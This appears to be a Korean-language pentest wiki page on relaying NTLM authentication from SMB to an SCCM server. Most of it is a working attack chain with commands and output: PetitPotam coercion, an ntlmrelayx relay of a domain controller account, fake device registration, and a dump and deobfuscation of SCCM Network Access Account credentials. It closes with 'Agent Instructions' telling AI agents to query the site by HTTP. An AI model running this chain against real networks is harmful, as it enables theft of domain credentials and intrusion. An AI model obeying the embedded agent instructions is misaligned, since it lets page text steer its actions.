# SMB to SCCM 다음의 페이지를 참고한다 [SCCM](/privilege-escalation/ad/sccm.md) \--- 예시 ``` // Authentication Coercion python3 petitpotam.py -u -p

// SCCM Relay to SCCM Server ntlmrelayx.py -t http:///ccm_system_windowsauth/request --sccm --sccm-device fake-device --sccm-fqdn domain.com --http-port 80 --sccm-server sccm --sccm-sleep 10 [*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.40.150, attacking target http://sccm.domain.com [*] HTTP server returned error code 200, treating as a successful login [*] Authenticating against http://sccm.domain.com as CHOI/DC01$ SUCCEED [*] Creating certificate for our fake server... [*] Registering our fake server... [*] Done.. our ID is 2EF87AF2-17E2-44F3-9D25-4876BC505ED4 [*] Sleeping 10 seconds to allow SCCM server time to process... [*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.40.150 controlled, but there are no more targets left! [*] Requesting NAAPolicy... [*] Parsing policy... [*] Decrypted policy dumped to naapolicy.xml --- // Obfuscated NAA Credentials └─# cat naapolicy.xml ]]> ]]> PS C:\dev\naadeobs\x64\Debug> .\naadeobs.exe 112233 choi\sccm-naa PS C:\dev\naadeobs \x64\Debug> .\naadeobs.exe 112233 Password123! ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.xn--hy1b43d247a.com/credential-access/ntlm-relay/smb-to-sccm.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.